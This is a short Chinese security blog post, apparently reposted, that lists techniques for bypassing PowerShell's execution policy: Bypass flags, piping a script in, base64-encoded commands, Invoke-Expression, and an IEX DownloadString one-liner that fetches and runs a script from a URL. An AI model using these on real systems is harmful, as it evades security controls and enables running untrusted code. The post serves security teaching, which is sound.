绕过 PowerShell 的执行策略

admin
admin
admin
139701
文章
114
评论
2023年12月15日00:56:57评论33 views字数 1136阅读3分47秒阅读模式

PowerShell Execution Policy 是用来决定哪些类型的 PowerShell 代码可以在系统中运行.

Restricted - 不允许任何脚本运行.
AllSigned - 只能允许经过数字签名的脚本.
RemoteSigned - 运行本地脚本不需要数字签名 远程的需要.
Unrestricted - 允许任何脚本运行.

查看当前的策略

Get-ExecutionPolicy

将 ExecutionPolicy 设置为 Bypass.

powershell.exe -ExecutionPolicy Bypass -File .\test.ps1

将 ExecutionPolicy 设置为 UnRestricted.

powershell.exe -ExecutionPolicy UnRestricted -File .\test.ps1

将 ExecutionPolicy 设置为 RemoteSigned.

powershell.exe -ExecutionPolicy RemoteSigned -File .\test.ps1

通过管道执行脚本.

PGet-Content .\test.ps1 | powershell.exe -

类似的还有 type 命令.

type .\test.ps1 | powershell.exe -

通过 IEX 远程下载脚本执行.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://localhost/test.ps1')"

unicode + base64 编码执行.

$command = Get-Content .\test.ps1
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand

好像会有引号的转义问题, 更改了下执行的脚本.

echo "echo 'hello world'" > .\test.ps1
$command = Get-Content .\test.ps1
powershell -command "$command"

Invoke-Expression 将它接受到的任何字符串当作 powershell 代码执行.

Get-Content .\test.ps1 | Invoke-Expression

- By:X1r0z[exp10it.cn]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日00:56:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   绕过 PowerShell 的执行策略https://cn-sec.com/archives/2301420.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息